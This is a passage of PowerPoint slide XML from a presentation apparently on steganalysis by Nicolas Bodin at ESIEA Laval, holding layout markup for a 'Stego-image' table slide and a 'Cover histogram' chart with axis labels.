                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033591" y="6621582"/>
            <a:ext cx="557448" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>17 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>49</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3381047" y="5842034"/>
            <a:ext cx="2292711" cy="305020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1982" spc="198" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333B2"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype"/>
                <a:cs typeface="Palatino Linotype"/>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333B2"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype"/>
                <a:cs typeface="Palatino Linotype"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333B2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-109" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stego-image</a:t>
            </a:r>
            <a:endParaRPr sz="1982">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1447683350"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1034363" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Steganalysis</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7765562" y="88033"/>
            <a:ext cx="820443" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>B.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549738" y="682125"/>
            <a:ext cx="2460072" cy="426912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Cover</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>histogram</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="5731802"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262571" y="5731802"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037579" y="5647550"/>
            <a:ext cx="129610" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="5065763"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262571" y="5065763"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812499" y="4980428"/>
            <a:ext cx="353596" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="4400067"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262571" y="4400067"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737424" y="4313891"/>
            <a:ext cx="429097" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="3734073"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262571" y="3734073"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737424" y="3646812"/>
            <a:ext cx="429097" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1500</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="3062844"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262571" y="3062844"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737424" y="2980228"/>
            <a:ext cx="429097" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="2396859"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262571" y="2396859"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
